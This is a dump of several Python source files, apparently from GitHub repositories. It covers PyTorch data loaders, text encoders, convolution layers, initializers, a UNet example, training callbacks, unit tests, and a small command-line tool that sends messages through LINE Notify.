path @classmethod def set_valid_data_path(cls, path): cls.valid_data_path = path def __init__(self, batch_size=128, test_batch_size=1024, bptt_length=10, num_workers=3, shuffle=True): self.batch_size = batch_size self.test_batch_size = test_batch_size self.bptt_length = bptt_length self.num_workers = num_workers self.shuffle = shuffle self.raw_data = dict( train=self._preprocess(self.train_data_path), valid=self._preprocess(self.valid_data_path), test=self._preprocess(self.test_data_path)) self.encoder = IdentityEncoder(self.raw_data['train'] + self.raw_data['valid'] + self.raw_data['test']) self.ntokens = self.encoder.vocab_size = dict( train=self.encoder.encode(self.raw_data['train']), valid=self.encoder.encode(self.raw_data['valid']), test=self.encoder.encode(self.raw_data['test'])) def get_dataloader(self, mode='train'): source_sampler = self._sampler([mode], self.bptt_length, self.batch_size, 'source') target_sampler = self._sampler([mode], self.bptt_length, self.batch_size, 'target') dataset = DummyDataset([mode], source_sampler, target_sampler) dataloader =, batch_size=1, shuffle=self.shuffle, num_workers=self.num_workers) return dataloader def _sampler(self, text, bptt_length, batch_size, type_): return BPTTBatchSampler(text, bptt_length, batch_size, True, type_) def _preprocess(self, path): full_path = Path(path).expanduser().resolve() text = [] with'utf-8') as f: for line in f: text.extend(line.replace('<unk>', UNKNOWN_TOKEN).split()) text.append(EOS_TOKEN) return text ``` #### File: first_deep/libs/ ```python from collections import Counter import torch from .reserved_tokens import EOS_INDEX from .reserved_tokens import RESERVED_ITOS from .reserved_tokens import UNKNOWN_INDEX def _tokenize(s): return s.split() class Encoder(object): """ Base class for a text encoder. """ def __init__(self): # pragma: no cover raise NotImplementedError def encode(self, string): # pragma: no cover """ Returns a :class:`torch.LongTensor` encoding of the `text`. """ raise NotImplementedError def batch_encode(self, strings, *args, **kwargs): """ Returns a :class:`list` of :class:`torch.LongTensor` encoding of the `text`. """ return [self.encode(s, *args, **kwargs) for s in strings] def decode(self, tensor): # pragma: no cover """ Given a :class:`torch.Tensor`, returns a :class:`str` representing the decoded text. Note that, depending on the tokenization method, the decoded version is not guaranteed to be the original text. """ raise NotImplementedError @property def vocab_size(self): """ Return the size (:class:`int`) of the vocabulary. """ return len(self.vocab) @property def vocab(self): # pragma: no cover """ Returns the vocabulary (:class:`list`) used to encode text. """ return NotImplementedError class StaticTokenizerEncoder(Encoder): """ Encodes the text using a tokenizer. Args: sample (list of strings): Sample of data to build dictionary on. min_occurrences (int, optional): Minimum number of occurrences for a token to be added to dictionary. tokenize (callable): :class:``callable`` to tokenize a string. append_eos (bool, optional): If `True` append EOS token onto the end to the encoded vector. reserved_tokens (list of str, optional): Tokens added to dictionary; reserving the first `len(reserved_tokens)` indexes. Example: >>> encoder = StaticTokenizerEncoder(["This ain't funny.", "Don't?"], tokenize=lambda s: s.split()) >>> encoder.encode("This ain't funny.") 5 6 7 [torch.LongTensor of size 3] >>> encoder.vocab ['<pad>', '<unk>', '</s>', '<s>', '<copy>', 'This', "ain't", 'funny.', "Don't?"] >>> encoder.decode(encoder.encode("This ain't funny.")) "This ain't funny." """ def __init__(self, sample, min_occurrences=1, append_eos=False, tokenize=_tokenize, reserved_tokens=RESERVED_ITOS): if not isinstance(sample, list): raise TypeError('Sample must be a list of strings.') self.tokenize = tokenize self.append_eos = append_eos self.tokens = Counter() for text in sample: self.tokens.update(self.tokenize(text)) self.itos = reserved_tokens.copy() self.stoi = {token: index for index, token in enumerate(reserved_tokens)} for token, count in self.tokens.items(): if count >= min_occurrences: self.itos.append(token) self.stoi[token] = len(self.itos) - 1 @property def vocab(self): return self.itos def encode(self, text, eos_index=EOS_INDEX, unknown_index=UNKNOWN_INDEX): text = self.tokenize(text) vector = [self.stoi.get(token, unknown_index) for token in text] if self.append_eos: vector.append(eos_index) return torch.LongTensor(vector) def decode(self, tensor): tokens = [self.itos[index] for index in tensor] return ' '.join(tokens) ```
{ "source": "0h-n0/inferno", "score": 3 }
#### File: inferno/examples/ ```python import matplotlib.pyplot as plt import torch from torch import nn import numpy ############################################################################## # determine whether we have a gpu # and should use cuda USE_CUDA = torch.cuda.is_available() ############################################################################## # Dataset # -------------- # For simplicity we will use a toy dataset where we need to perform # a binary segmentation task. from import get_binary_blob_loaders # convert labels from long to float as needed by # binary cross entropy loss def label_transform(x): return torch.from_numpy(x).float() #label_transform = lambda x : torch.from_numpy(x).float() train_loader, test_loader, validate_loader = get_binary_blob_loaders( size=8, # how many images per {train,test,validate} train_batch_size=2, length=256, # <= size of the images gaussian_noise_sigma=1.4, # <= how noise are the images train_label_transform = label_transform, validate_label_transform = label_transform ) image_channels = 1 # <-- number of channels of the image pred_channels = 1 # <-- number of channels needed for the prediction if False: ############################################################################## # Visualize Dataset # ~~~~~~~~~~~~~~~~~~~~~~ fig = plt.figure() for i,(image, target) in enumerate(train_loader): ax = fig.add_subplot(1, 2, 1) ax.imshow(image[0,0,...]) ax.set_title('raw data') ax = fig.add_subplot(1, 2, 2) ax.imshow(target[0,...]) ax.set_title('ground truth') break fig.tight_layout() ############################################################################## # Training # ---------------------------- # To train the unet, we use the infernos Trainer class of inferno. # Since we train many models later on in this example we encapsulate # the training in a function (see :ref:`` for # an example dedicated to the trainer itself). from inferno.trainers import Trainer from inferno.utils.python_utils import ensure_dir def train_model(model, loaders, **kwargs): trainer = Trainer(model) trainer.build_criterion('BCEWithLogitsLoss') trainer.build_optimizer('Adam', lr=kwargs.get('lr', 0.0001)) #trainer.validate_every((kwargs.get('validate_every', 10), 'epochs')) #trainer.save_every((kwargs.get('save_every', 10), 'epochs')) #trainer.save_to_directory(ensure_dir(kwargs.get('save_dir', 'save_dor'))) trainer.set_max_num_epochs(kwargs.get('max_num_epochs', 20)) # bind the loaders trainer.bind_loader('train', loaders[0]) trainer.bind_loader('validate', loaders[1]) if USE_CUDA: trainer.cuda() # do the training return trainer ############################################################################## # Prediction # ---------------------------- # The trainer contains the trained model and we can do predictions. # We use :code:`unwrap` to convert the results to numpy arrays. # Since we want to do many prediction we encapsulate the # the prediction in a function from inferno.utils.torch_utils import unwrap def predict(trainer, test_loader, save_dir=None): trainer.eval_mode() for image, target in test_loader: # transfer image to gpu image = image.cuda() if USE_CUDA else image # get batch size from image batch_size = image.size()[0] for b in range(batch_size): prediction = trainer.apply_model(image) prediction = torch.nn.functional.sigmoid(prediction) image = unwrap(image, as_numpy=True, to_cpu=True) prediction = unwrap(prediction, as_numpy=True, to_cpu=True) target = unwrap(target, as_numpy=True, to_cpu=True) fig = plt.figure() ax = fig.add_subplot(2, 2, 1) ax.imshow(image[b,0,...]) ax.set_title('raw data') ax = fig.add_subplot(2, 2, 2) ax.imshow(target[b,...]) ax.set_title('ground truth') ax = fig.add_subplot(2, 2, 4) ax.imshow(prediction[b,...]) ax.set_title('prediction') fig.tight_layout() ############################################################################## # Custom UNet # ---------------------------- # Often one needs to have a UNet with custom layers. # Here we show how to implement such a customized UNet. # To this end we derive from :code:`UNetBase`. # For the sake of this example we will create # a Unet which uses depthwise convolutions and might be trained on a CPU from inferno.extensions.models import UNetBase from inferno.extensions.layers import ConvSELU2D, ConvReLU2D, ConvELU2D, ConvSigmoid2D,Conv2D,ConvActivation class CheapConv(nn.Module): def __init__(self, in_channels, out_channels, activated): super(CheapConv, self).__init__() self.in_channels = in_channels self.out_channels = out_channels if activated: self.convs = torch.nn.Sequential( ConvActivation(in_channels=in_channels, out_channels=in_channels, depthwise=True, kernel_size=(3, 3), activation='ReLU', dim=2), ConvReLU2D(in_channels=in_channels, out_channels=out_channels, kernel_size=(1,1)) ) else: self.convs = torch.nn.Sequential( ConvActivation(in_channels=in_channels, out_channels=in_channels, depthwise=True, kernel_size=(3, 3), activation='ReLU', dim=2), Conv2D(in_channels=in_channels, out_channels=out_channels, kernel_size=(1,1)) ) def forward(self, x): assert x.shape[1] == self.in_channels,"input has wrong number of channels" x = self.convs(x) assert x.shape[1] == self.out_channels,"output has wrong number of channels" return x class CheapConvBlock(nn.Module): def __init__(self, in_channels, out_channels, activated): super(CheapConvBlock, self).__init__() self.activated = activated self.in_channels = in_channels self.out_channels = out_channels if(in_channels != out_channels): self.start = ConvReLU2D(in_channels=in_channels, out_channels=out_channels, kernel_size=(1,1)) else: self.start = None self.conv_a = CheapConv(in_channels=out_channels, out_channels=out_channels, activated=True) self.conv_b = CheapConv(in_channels=out_channels, out_channels=out_channels, activated=False) self.activation = torch.nn.ReLU() def forward(self, x): x_input = x if self.start is not None: x_input = self.start(x_input) x = self.conv_a(x_input) x = self.conv_b(x) x = x + x_input if self.activated: x = self.activation(x) return x class MySimple2DCpUnet(UNetBase): def __init__(self, in_channels, out_channels, depth=3, residual=False, **kwargs): super(MySimple2DCpUnet, self).__init__(in_channels=in_channels, out_channels=out_channels, dim=2, depth=depth, **kwargs) def conv_op_factory(self, in_channels, out_channels, part, index): # last? last = part == 'up' and index==0 return CheapConvBlock(in_channels=in_channels, out_channels=out_channels, activated=not last),False from inferno.extensions.layers import RemoveSingletonDimension model_b = torch.nn.Sequential( CheapConv(in_channels=image_channels, out_channels=4, activated=True), MySimple2DCpUnet(in_channels=4, out_channels=pred_channels) , RemoveSingletonDimension(dim=1) ) ################################################### # do the training (with the same functions as before) trainer = train_model(model=model_b, loaders=[train_loader, validate_loader], save_dir='model_b', lr=0.001) ################################################### # do the training (with the same functions as before)1 predict(trainer=trainer, test_loader=test_loader) ``` #### File: extensions/initializers/ ```python import torch.nn.init as init __all__ = ['Initializer', 'Initialization', 'WeightInitFunction', 'BiasInitFunction', 'TensorInitFunction'] class Initializer(object): """ Base class for all initializers. """ # TODO Support LSTMs and GRUs VALID_LAYERS = {'Conv1d', 'Conv2d', 'Conv3d', 'ConvTranspose1d', 'ConvTranspose2d', 'ConvTranspose3d', 'Linear', 'Bilinear', 'Embedding'} def __call__(self, module): module_class_name = module.__class__.__name__ if module_class_name in self.VALID_LAYERS: # Apply to weight and bias try: if hasattr(module, 'weight'): self.call_on_weight( except NotImplementedError: # Don't cry if it's not implemented pass try: if hasattr(module, 'bias'): self.call_on_bias( except NotImplementedError: pass return module def call_on_bias(self, tensor): return self.call_on_tensor(tensor) def call_on_weight(self, tensor): return self.call_on_tensor(tensor) def call_on_tensor(self, tensor): raise NotImplementedError @classmethod def initializes_weight(cls): return 'call_on_tensor' in cls.__dict__ or 'call_on_weight' in cls.__dict__ @classmethod def initializes_bias(cls): return 'call_on_tensor' in cls.__dict__ or 'call_on_bias' in cls.__dict__ class Initialization(Initializer): def __init__(self, weight_initializer=None, bias_initializer=None): if weight_initializer is None: self.weight_initializer = Initializer() else: if isinstance(weight_initializer, Initializer): assert weight_initializer.initializes_weight() self.weight_initializer = weight_initializer elif isinstance(weight_initializer, str): init_function = getattr(init, weight_initializer, None) assert init_function is not None self.weight_initializer = WeightInitFunction(init_function=init_function) else: # Provison for weight_initializer to be a function assert callable(weight_initializer) self.weight_initializer = WeightInitFunction(init_function=weight_initializer) if bias_initializer is None: self.bias_initializer = Initializer() else: if isinstance(bias_initializer, Initializer): assert bias_initializer.initializes_bias self.bias_initializer = bias_initializer elif isinstance(bias_initializer, str): init_function = getattr(init, bias_initializer, None) assert init_function is not None self.bias_initializer = BiasInitFunction(init_function=init_function) else: assert callable(bias_initializer) self.bias_initializer = BiasInitFunction(init_function=bias_initializer) def call_on_weight(self, tensor): return self.weight_initializer.call_on_weight(tensor) def call_on_bias(self, tensor): return self.bias_initializer.call_on_bias(tensor) class WeightInitFunction(Initializer): def __init__(self, init_function, *init_function_args, **init_function_kwargs): super(WeightInitFunction, self).__init__() assert callable(init_function) self.init_function = init_function self.init_function_args = init_function_args self.init_function_kwargs = init_function_kwargs def call_on_weight(self, tensor): return self.init_function(tensor, *self.init_function_args, **self.init_function_kwargs) class BiasInitFunction(Initializer): def __init__(self, init_function, *init_function_args, **init_function_kwargs): super(BiasInitFunction, self).__init__() assert callable(init_function) self.init_function = init_function self.init_function_args = init_function_args self.init_function_kwargs = init_function_kwargs def call_on_bias(self, tensor): return self.init_function(tensor, *self.init_function_args, **self.init_function_kwargs) class TensorInitFunction(Initializer): def __init__(self, init_function, *init_function_args, **init_function_kwargs): super(TensorInitFunction, self).__init__() assert callable(init_function) self.init_function = init_function self.init_function_args = init_function_args self.init_function_kwargs = init_function_kwargs def call_on_tensor(self, tensor): return self.init_function(tensor, *self.init_function_args, **self.init_function_kwargs) ``` #### File: extensions/layers/ ```python import torch.nn as nn import sys import functools from ..initializers import ( OrthogonalWeightsZeroBias, KaimingNormalWeightsZeroBias, SELUWeightsZeroBias, ) from ..initializers import Initializer from .normalization import BatchNormND from .activations import SELU from ...utils.exceptions import assert_, ShapeError from ...utils.partial_cls import register_partial_cls # we append to this later on __all__ = [ "GlobalConv2D", ] _all = __all__ register_partial_cls_here = functools.partial(register_partial_cls, module=__name__) class ConvActivation(nn.Module): """Convolutional layer with 'SAME' padding by default followed by an activation.""" def __init__( self, in_channels, out_channels, kernel_size, dim, activation, stride=1, dilation=1, groups=None, depthwise=False, bias=True, deconv=False, initialization=None, valid_conv=False, ): super(ConvActivation, self).__init__() # Validate dim assert_( dim in [1, 2, 3], "`dim` must be one of [1, 2, 3], got {}.".format(dim), ShapeError, ) self.dim = dim # Check if depthwise if depthwise: # We know that in_channels == out_channels, but we also want a consistent API. # As a compromise, we allow that out_channels be None or 'auto'. out_channels = in_channels if out_channels in [None, "auto"] else out_channel assert_( in_channels == out_channels, "For depthwise convolutions, number of input channels (given: {}) " "must equal the number of output channels (given {}).".format( in_channels, out_channels ), ValueError, ) assert_( groups is None or groups == in_channels, "For depthwise convolutions, groups (given: {}) must " "equal the number of channels (given: {}).".format(groups, in_channels), ) groups = in_channels else: groups = 1 if groups is None else groups self.depthwise = depthwise if valid_conv: self.conv = getattr(nn, "Conv{}d".format(self.dim))( in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, dilation=dilation, groups=groups, bias=bias, ) elif not deconv: # Get padding padding = self.get_padding(kernel_size, dilation) self.conv = getattr(nn, "Conv{}d".format(self.dim))( in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, padding=padding, stride=stride, dilation=dilation, groups=groups, bias=bias, ) else: self.conv = getattr(nn, "ConvTranspose{}d".format(self.dim))( in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride, dilation=dilation, groups=groups, bias=bias, ) if initialization is None: pass elif isinstance(initialization, Initializer): self.conv.apply(initialization) else: raise NotImplementedError if isinstance(activation, str): self.activation = getattr(nn, activation)() elif isinstance(activation, nn.Module): self.activation = activation elif activation is None: self.activation = None else: raise NotImplementedError def forward(self, input): conved = self.conv(input) if self.activation is not None: activated = self.activation(conved) else: # No activation activated = conved return activated def _pair_or_triplet(self, object_): if isinstance(object_, (list, tuple)): assert len(object_) == self.dim return object_ else: object_ = [object_] * self.dim return object_ def _get_padding(self, _kernel_size, _dilation): assert isinstance(_kernel_size, int) assert isinstance(_dilation, int) assert _kernel_size % 2 == 1 return ((_kernel_size - 1) // 2) * _dilation def get_padding(self, kernel_size, dilation): kernel_size = self._pair_or_triplet(kernel_size) dilation = self._pair_or_triplet(dilation) padding = [ self._get_padding(_kernel_size, _dilation) for _kernel_size, _dilation in zip(kernel_size, dilation) ] return tuple(padding) # for consistency ConvActivationND = ConvActivation # noinspection PyUnresolvedReferences class _BNReLUSomeConv(object): def forward(self, input): normed = self.batchnorm(input) activated = self.activation(normed) conved = self.conv(activated) return conved class BNReLUConvBaseND(_BNReLUSomeConv, ConvActivation): def __init__(self, in_channels, out_channels, kernel_size, dim, stride=1, dilation=1, deconv=False): super(BNReLUConvBaseND, self).__init__( in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, dim=dim, stride=stride, activation=nn.ReLU(inplace=True), dilation=dilation, deconv=deconv, initialization=KaimingNormalWeightsZeroBias(0), ) self.batchnorm = BatchNormND(dim, in_channels) def _register_conv_cls(conv_name, fix=None, default=None): if fix is None: fix = {} if default is None: default = {} # simple conv activation activations = ["ReLU", "ELU", "Sigmoid", "SELU", ""] init_map = { "ReLU": KaimingNormalWeightsZeroBias, "SELU": SELUWeightsZeroBias } for activation_str in activations: cls_name = cls_name = "{}{}ND".format(conv_name,activation_str) __all__.append(cls_name) initialization_cls = init_map.get(activation_str, OrthogonalWeightsZeroBias) if activation_str == "": activation = None _fix = {**fix} _default = {'activation':None} elif activation_str == "SELU": activation = nn.SELU(inplace=True) _fix={**fix, 'activation':activation} _default = {**default} else: activation = activation_str _fix={**fix, 'activation':activation} _default = {**default} register_partial_cls_here(ConvActivation, cls_name, fix=_fix, default={**_default, 'initialization':initialization_cls()} ) for dim in [1, 2, 3]: cls_name = "{}{}{}D".format(conv_name,activation_str, dim) __all__.append(cls_name) register_partial_cls_here(ConvActivation, cls_name, fix={**_fix, 'dim':dim}, default={**_default, 'initialization':initialization_cls()} ) def _register_bnr_conv_cls(conv_name, fix=None, default=None): if fix is None: fix = {} if default is None: default = {} for dim in [1, 2, 3]: cls_name = "BNReLU{}ND".format(conv_name) __all__.append(cls_name) register_partial_cls_here(BNReLUConvBaseND, cls_name,fix=fix,default=default) for dim in [1, 2, 3]: cls_name = "BNReLU{}{}D".format(conv_name, dim) __all__.append(cls_name) register_partial_cls_here(BNReLUConvBaseND, cls_name, fix={**fix, 'dim':dim}, default=default) # conv classes _register_conv_cls("Conv") _register_conv_cls("ValidConv", fix=dict(valid_conv=True)) _register_conv_cls("Deconv", fix=dict(deconv=True), default=dict(kernel_size=2, stride=2)) _register_conv_cls("StridedConv", default=dict(stride=2)) _register_conv_cls("DilatedConv", fix=dict(dilation=2)) _register_conv_cls("DepthwiseConv", fix=dict(deconv=False, depthwise=True), default=dict(out_channels='auto')) # BatchNormRelu classes _register_bnr_conv_cls("Conv", fix=dict(deconv=False)) _register_bnr_conv_cls("Deconv", fix=dict(deconv=True)) _register_bnr_conv_cls("StridedConv", default=dict(stride=2)) _register_bnr_conv_cls("DilatedConv", default=dict(dilation=2)) _register_bnr_conv_cls("DepthwiseConv", fix=dict(deconv=False, depthwise=True), default=dict(out_channels='auto')) del _register_conv_cls del _register_bnr_conv_cls class GlobalConv2D(nn.Module): """From Main idea: we can have a bigger kernel size computationally acceptable if we separate 2D-conv in 2 1D-convs """ def __init__( self, in_channels, out_channels, kernel_size, local_conv_type, activation=None, use_BN=False, **kwargs ): super(GlobalConv2D, self).__init__() self.in_channels = in_channels self.out_channels = out_channels self.kernel_size = kernel_size assert isinstance(kernel_size, (int, list, tuple)) if isinstance(kernel_size, int): kernel_size = (kernel_size,) * 2 self.kwargs = kwargs self.conv1a = local_conv_type( in_channels=self.in_channels, out_channels=self.out_channels, kernel_size=(kernel_size[0], 1), **kwargs ) self.conv1b = local_conv_type( in_channels=self.out_channels, out_channels=self.out_channels, kernel_size=(1, kernel_size[1]), **kwargs ) self.conv2a = local_conv_type( in_channels=self.in_channels, out_channels=self.out_channels, kernel_size=(1, kernel_size[1]), **kwargs ) self.conv2b = local_conv_type( in_channels=self.out_channels, out_channels=self.out_channels, kernel_size=(kernel_size[0], 1), **kwargs ) if use_BN: self.batchnorm = nn.BatchNorm2d(self.out_channels) else: self.batchnorm = None self.activation = activation def forward(self, input_): out1 = self.conv1a(input_) out1 = self.conv1b(out1) out2 = self.conv2a(input_) out2 = self.conv2b(out2) out = out1.add(1, out2) if self.activation is not None: out = self.activation(out) if self.batchnorm is not None: out = self.batchnorm(out) return out ``` #### File: io/box/ ```python import as data import import numpy from operator import mul from functools import reduce class BinaryBlobs(data.Dataset): def __init__(self, size=20, length=512, blob_size_fraction=0.1, n_dim=2, volume_fraction=0.5,split='train', uniform_noise_range=(-1.2, 1.2), gaussian_noise_sigma=1.2, noise_scale_factor=8, image_transform=None, label_transform=None, joint_transform=None): # how many images are in the dataset self.size = size # blob related members self.length = length self.blob_size_fraction = blob_size_fraction self.n_dim = n_dim self.volume_fraction = volume_fraction # which split {'train', 'test', 'validate'} self.split = split # noise related members self.uniform_noise_range = uniform_noise_range self.gaussian_noise_sigma = float(gaussian_noise_sigma) self.noise_scale_factor = noise_scale_factor # transforms self.image_transform = image_transform self.label_transform = label_transform self.joint_transform = joint_transform # internal split_to_seed = dict(train=0, test=1, validate=2) self.master_seed = split_to_seed[self.split]*self.size def __getitem__(self, index): # generate the labels label = length=self.length, blob_size_fraction=self.blob_size_fraction, n_dim=self.n_dim, volume_fraction=self.volume_fraction, seed=self.master_seed + index) # make the raw image [-1,1] image = label.astype('float32')*2 image -= 1 # add uniform noise low, high = self.uniform_noise_range uniform_noise = numpy.random.uniform(low=low, high=high, size=image.size) image += uniform_noise.reshape(image.shape) # add gaussian noise gaussian_noise = numpy.random.normal(scale=self.gaussian_noise_sigma, size=image.size) image += gaussian_noise.reshape(image.shape) # generate noise at lower scales small_shape = [s//self.noise_scale_factor for s in label.shape] small_size = reduce(mul, small_shape, 1) small_noise_img = numpy.random.uniform(low=low, high=high, size=small_size) small_noise_img = small_noise_img.reshape(small_shape) gaussian_noise = numpy.random.normal(scale=self.gaussian_noise_sigma, size=small_size) small_noise_img += gaussian_noise.reshape(small_shape) noise_img = skimage.transform.resize(image = small_noise_img, output_shape=image.shape, mode='reflect') image += noise_img image -= image.mean() image /= image.std() label = label.astype('long') try: # Apply transforms if self.image_transform is not None: image = self.image_transform(image) if self.label_transform is not None: label = self.label_transform(label) if self.joint_transform is not None: image, label = self.joint_transform(image, label) except Exception: print("[!] An Exception occurred while applying the transforms at " "index {} of split '{}'.".format(index, self.split)) raise image = image[None,...] return image, label def __len__(self): return self.size def get_binary_blob_loaders(train_batch_size=1, test_batch_size=1, num_workers=1, train_image_transform=None, train_label_transform=None, train_joint_transform=None, validate_image_transform=None, validate_label_transform=None, validate_joint_transform=None, test_image_transform=None, test_label_transform=None, test_joint_transform=None, **kwargs): trainset = BinaryBlobs(split='train', image_transform=train_image_transform, label_transform=train_label_transform, joint_transform=train_joint_transform, **kwargs) testset = BinaryBlobs(split='test', image_transform=test_image_transform, label_transform=test_label_transform, joint_transform=test_joint_transform, **kwargs) validset = BinaryBlobs(split='validate',image_transform=validate_image_transform, label_transform=validate_label_transform, joint_transform=validate_joint_transform, **kwargs) trainloader = data.DataLoader(trainset, batch_size=train_batch_size, num_workers=num_workers) testloader = data.DataLoader(testset, batch_size=test_batch_size, num_workers=num_workers) validloader = data.DataLoader(validset, batch_size=test_batch_size, num_workers=num_workers) return trainloader, testloader, validloader if __name__ == "__main__": ds = BinaryBlobs() ds[0] ``` #### File: trainers/callbacks/ ```python from ...utils.train_utils import Frequency from ...utils.exceptions import assert_, FrequencyValueError from .base import Callback class LogOutputGradients(Callback): """Logs the gradient of the network output""" def __init__(self, frequency): super(LogOutputGradients, self).__init__() self.log_every = frequency self.registered = False self.hook_handle = None @property def log_every(self): return self._log_every @log_every.setter def log_every(self, value): self._log_every = Frequency(value, 'iterations') assert_(self.log_every.is_consistent, "Log frequency is not consistent.", FrequencyValueError) def hook(self, module, grad_input, grad_output): #remove hook if trainer does not exits if self.trainer is None: self.hook_handle.remove() return if self.log_every.match(iteration_count=self.trainer.iteration_count, epoch_count=self.trainer.epoch_count, persistent=True, match_zero=True): self.trainer.update_state('output_gradient', grad_output[0].detach().float().clone().cpu()) def add_hook(self): self.hook_handle = self.trainer.model.register_backward_hook(self.hook) def begin_of_fit(self, **kwargs): self._trainer.logger.observe_state("output_gradient", observe_while='training') self.add_hook() def begin_of_save(self, **_): # remove hook from model, because you can't pickle it. if self.hook_handle is not None: self.hook_handle.remove() self.hook_handle = None def end_of_save(self, **_): # add hook after model save self.add_hook() ``` #### File: callbacks/logging/ ```python import os from ..base import Callback class Logger(Callback): """ A special callback for logging. Loggers are special because they're required to be serializable, whereas other callbacks have no such guarantees. In this regard, they jointly handled by trainers and the callback engine. """ def __init__(self, log_directory=None): super(Logger, self).__init__() self._log_directory = None if log_directory is not None: self.set_log_directory(log_directory) @property def log_directory(self): if self._log_directory is not None: return self._log_directory elif self.trainer is not None and self.trainer._log_directory is not None: return self.trainer._log_directory else: raise RuntimeError("No log directory found.") @log_directory.setter def log_directory(self, value): self.set_log_directory(value) def set_log_directory(self, log_directory): assert isinstance(log_directory, str) if not os.path.isdir(log_directory): assert not os.path.exists(log_directory) os.makedirs(log_directory) self._log_directory = log_directory return self ``` #### File: callbacks/logging/ ```python __all__ = ['get_logger'] try: INFERNO_WITH_TENSORBOARD_LOGGER = True from .tensorboard import TensorboardLogger __all__.append('TensorboardLogger') except ImportError: INFERNO_WITH_TENSORBOARD_LOGGER = False def get_logger(name): if name in globals(): return globals().get(name) else: raise NotImplementedError("Logger not found.") ``` #### File: trainers/callbacks/ ```python from .base import Callback class TQDMProgressBar(Callback): def __init__(self, *args, **kwargs): super(TQDMProgressBar, self).__init__(*args, **kwargs) def bind_trainer(self, *args, **kwargs): super(TQDMProgressBar, self).bind_trainer(*args, **kwargs) self.trainer.console.warning("tqdm is not installed. will fall back to normal stdout console.") def begin_of_fit(self, **_): pass ``` #### File: test_extensions/test_layers/ ```python import unittest from inferno.extensions.layers.device import DeviceTransfer, OnDevice import torch class TransferTest(unittest.TestCase): @unittest.skipIf(not torch.cuda.is_available(), "GPU not available.") def test_device_transfer(self): if not torch.cuda.is_available(): return # Build transfer model transfer = DeviceTransfer('cpu') x = torch.rand(10, 10).cuda() y = transfer(x) loss = y.mean() loss.backward() self.assertFalse( self.assertIsNotNone(x.grad) self.assertTrue( @unittest.skipIf(not torch.cuda.is_available(), "GPU not available.") def test_on_device(self): if not torch.cuda.is_available(): return # Build variable on the GPU x = torch.rand(1, 10) # Build model over multiple devices multi_device_model = torch.nn.Sequential(OnDevice(torch.nn.Linear(10, 10), 'cuda'), OnDevice(torch.nn.Linear(10, 10), 'cpu')) y = multi_device_model(x) self.assertIsInstance(, torch.FloatTensor) if __name__ == '__main__': unittest.main() ``` #### File: test_callbacks/test_logging/ ```python import unittest import os from shutil import rmtree import numpy as np import torch import torch.nn as nn from inferno.trainers.basic import Trainer from import TensorDataset from import DataLoader from inferno.trainers.callbacks.logging.tensorboard import TensorboardLogger from inferno.extensions.layers.reshape import AsMatrix class TestTensorboard(unittest.TestCase): ROOT_DIR = os.path.dirname(__file__) PRECISION = 'float' SAVE_DIRECTORY = os.path.join(ROOT_DIR, 'saves') LOG_DIRECTORY = os.path.join(ROOT_DIR, 'logs') @staticmethod def _make_test_model(input_channels): toy_net = nn.Sequential(nn.Conv2d(input_channels, 8, 3, 1, 1), nn.ELU(), nn.MaxPool2d(2), nn.Conv2d(8, 8, 3, 1, 1), nn.ELU(), nn.MaxPool2d(2), nn.Conv2d(8, 16, 3, 1, 1), nn.ELU(), nn.AdaptiveMaxPool2d((1, 1)), AsMatrix(), nn.Linear(16, 10)) return toy_net def tearDown(self): for d in [self.SAVE_DIRECTORY, self.LOG_DIRECTORY]: try: rmtree(d) except OSError: pass def get_random_dataloaders(self, input_channels=3): # Convert build random tensor dataset data_shape = (1, input_channels, 64, 64) target_shape = (1) random_array = torch.from_numpy(np.random.rand(*data_shape)).float() target_array = torch.from_numpy(np.random.randint(0, 9, size=target_shape)) train_dataset = TensorDataset(random_array, target_array) test_dataset = TensorDataset(random_array, target_array) # Build dataloaders from dataset train_loader = DataLoader(train_dataset, batch_size=1, shuffle=True, num_workers=0, pin_memory=False) test_loader = DataLoader(test_dataset, batch_size=1, shuffle=True, num_workers=0, pin_memory=False) return train_loader, test_loader def get_trainer(self, input_channels): # Build model net = self._make_test_model(input_channels) # Build trainer trainer = Trainer(net)\ .build_logger(TensorboardLogger(send_image_at_batch_indices=0, send_image_at_channel_indices='all', log_images_every=(20, 'iterations')), log_directory=self.LOG_DIRECTORY)\ .build_criterion('CrossEntropyLoss')\ .build_metric('CategoricalError')\ .build_optimizer('Adam')\ .validate_every((1, 'epochs'))\ .save_every((2, 'epochs'), to_directory=self.SAVE_DIRECTORY)\ .save_at_best_validation_score()\ .set_max_num_epochs(2)\ .set_precision(self.PRECISION) # Bind loaders train_loader, test_loader = self.get_random_dataloaders(input_channels=input_channels) trainer.bind_loader('train', train_loader).bind_loader('validate', test_loader) return trainer def test_tensorboard(self): trainer = self.get_trainer(3) def test_tensorboard_grayscale(self): trainer = self.get_trainer(1) def test_serialization(self): trainer = self.get_trainer(3) # Serialize # Unserialize trainer = Trainer().load(os.path.join(self.ROOT_DIR, 'saves')) train_loader, test_loader = self.get_random_dataloaders(input_channels=3) trainer.bind_loader('train', train_loader).bind_loader('validate', test_loader) if __name__ == '__main__': unittest.main() ```
{ "source": "0h-n0/linensend", "score": 3 }
#### File: 0h-n0/linensend/ ```python import requests def line_notify(line_token, message): endpoint = '' message = "\n{}".format(message) payload = {'message': message} headers = {'Authorization': 'Bearer {}'.format(line_token)}, data=payload, headers=headers) print(f"Send your message: {message}") def get_args(): import argparse description = ('send a message from command line to LINE service.', ' Before sending a message, You have to create your ', 'access token via') parser = argparse.ArgumentParser(description=description) parser.add_argument('-t', '--token', action='store', nargs='?', const=None, required=True, type=str, choices=None, help=('set your LINE token.'), metavar=None) parser.add_argument('-m', '--message', action='store', nargs='?', const=None, required=True, type=str, choices=None, help=('set your message.'), metavar=None) return parser.parse_args() def commandline(): args = get_args() line_notify(args.token, args.message) ```
{ "source": "0h-n0/NeuralNetworkPhys", "score": 3 }
